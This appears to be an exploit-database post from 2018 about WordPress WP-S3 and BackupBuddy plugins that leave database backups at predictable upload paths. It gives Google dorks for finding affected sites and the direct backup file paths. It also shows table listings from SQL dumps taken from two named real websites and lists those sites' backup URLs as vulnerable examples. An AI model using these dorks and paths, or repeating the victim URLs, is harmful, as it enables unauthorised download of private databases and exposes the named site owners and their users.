facebook facebook twitter rss

WordPress Ithemes-BackupBuddy Amazon WP-S3 Plugins 2.9 Database Backup Disclosure

Author: KingSkrupellos , Published: 21-12-2018
#################################################################################################

# Exploit Title : WordPress Ithemes-BackupBuddy Amazon WP-S3 Plugins 2.9 Database Backup Disclosure
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
# Date : 17/12/2018
# Vendor Homepage : ithemes.com/purchase/backupbuddy/ ~ wordpress.org/plugins/wp-s3/
# Software Download Link : downloads.wordpress.org/plugin/wp-s3.1.5.zip
# Tested On : Windows and Linux
# Category : WebApps
# Version Information : WP-S3 1.5 Version - Ithemes-BackupBuddy 2.9 Version
# Exploit Risk : Medium
# Google Dorks : inurl:''/wp-content/uploads/wp-s3-database-backup.sql''
+ intext:''Powered by Shopify''
+ intext:© 2018, Holy Sparks Jewish Art & Books For Spiritual & Personal Development Powered by Shopify''
+ intext:''2015 © ALL RIGHTS RESERVED BY THE-SCHMIDT''
# Vulnerability Type : CWE-264 - [ Permissions, Privileges, and Access Controls ]
CWE-23 - [ Relative Path Traversal ] - CWE-200 [ Information Exposure ]
CWE-530 [ Exposure of Backup File to an Unauthorized Control Sphere ]

#################################################################################################

WordPress Amazon S3 Plugin 1.5 and WordPress Ithemes-BackupBuddy 2.9

#################################################################################################

# Admin Panel Login Path :

/wp-login.php

# Exploit :

/wp-content/uploads/wp-s3-database-backup.sql

/wp-content/uploads/wp-s3-backups.zip

#################################################################################################

# Example SQL Dump Some Informations and Tables Names => holysparks.org

-- MySQL dump 10.13 Distrib 5.1.58, for unknown-linux-gnu (x86_64)
--
-- Host: localhost Database: raeshaga_wrd1
-- ------------------------------------------------------
-- Server version 5.1.58-community-log

-- Table structure for table `wp_StreamPad_Tracks`

-- Dumping data for table `wp_StreamPad_Tracks`

-- Table structure for table `wp_affiliates_banners_tbl`

-- Dumping data for table `wp_affiliates_banners_tbl`

-- Table structure for table `wp_affiliates_clickthroughs_tbl`

-- Dumping data for table `wp_affiliates_clickthroughs_tbl`

-- Table structure for table `wp_affiliates_leads_tbl`

-- Dumping data for table `wp_affiliates_leads_tbl`

-- Table structure for table `wp_affiliates_payouts_tbl`

-- Dumping data for table `wp_affiliates_payouts_tbl`

-- Table structure for table `wp_affiliates_sales_tbl`

-- Dumping data for table `wp_affiliates_sales_tbl`

-- Table structure for table `wp_affiliates_tbl`

-- Dumping data for table `wp_affiliates_tbl`

-- Table structure for table `wp_commentmeta`

-- Dumping data for table `wp_commentmeta`

-- Table structure for table `wp_comments`

-- Dumping data for table `wp_comments`

-- Table structure for table `wp_contact_form_7`

-- Dumping data for table `wp_contact_form_7`

-- Table structure for table `wp_ft_wpecards`

-- Dumping data for table `wp_ft_wpecards`

-- Table structure for table `wp_links`

-- Dumping data for table `wp_links`

-- Table structure for table `wp_options`

-- Dumping data for table `wp_options`

-- Dump completed....

################################################################################################

# Example SQL Dump Informations and Tables Names => the-schmidt.com

-- MySQL dump 10.13 Distrib 5.1.60, for unknown-linux-gnu (x86_64)
--
-- Host: localhost Database: theschm1_blog
-- ------------------------------------------------------
-- Server version 5.1.60-community-log

-- Table structure for table `wp_PluginManager`

-- Dumping data for table `wp_PluginManager`

-- Table structure for table `wp_custom_fonts`

-- Dumping data for table `wp_custom_fonts`

-- Table structure for table `wp_cvg_gallery`

-- Dumping data for table `wp_cvg_gallery`

-- Table structure for table `wp_cvg_videos`

-- Dumping data for table `wp_cvg_videos`

-- Table structure for table `wp_download_status`

-- Dumping data for table `wp_download_status`

-- Table structure for table `wp_fancybox`

-- Dumping data for table `wp_fancybox`

-- Table structure for table `wp_item_category_associations`

-- Dumping data for table `wp_item_category_associations`

-- Table structure for table `wp_links`

-- Dumping data for table `wp_links`

-- Table structure for table `wp_ngg_album`

-- Dumping data for table `wp_ngg_album`

-- Table structure for table `wp_ngg_gallery`

-- Dumping data for table `wp_ngg_gallery`

-- Table structure for table `wp_ngg_pictures`

-- Dumping data for table `wp_ngg_pictures`

-- Table structure for table `wp_also_bought_product`

-- Dumping data for table `wp_also_bought_product`

-- Table structure for table `wp_blc_filters`

-- Dumping data for table `wp_blc_filters`

-- Table structure for table `wp_blc_instances`

-- Dumping data for table `wp_blc_instances`

-- Table structure for table `wp_blc_links`

-- Dumping data for table `wp_blc_links`

-- Table structure for table `wp_options`

-- Dumping data for table `wp_options`

-- Dump completed...

#################################################################################################

# Example Vulnerable Sites =>

[+] holysparks.org/wp-content/uploads/wp-s3-database-backup.sql

[+] the-schmidt.com/blog/wp-content/uploads/wp-s3-database-backup.sql

#################################################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team

Like us on Facebook :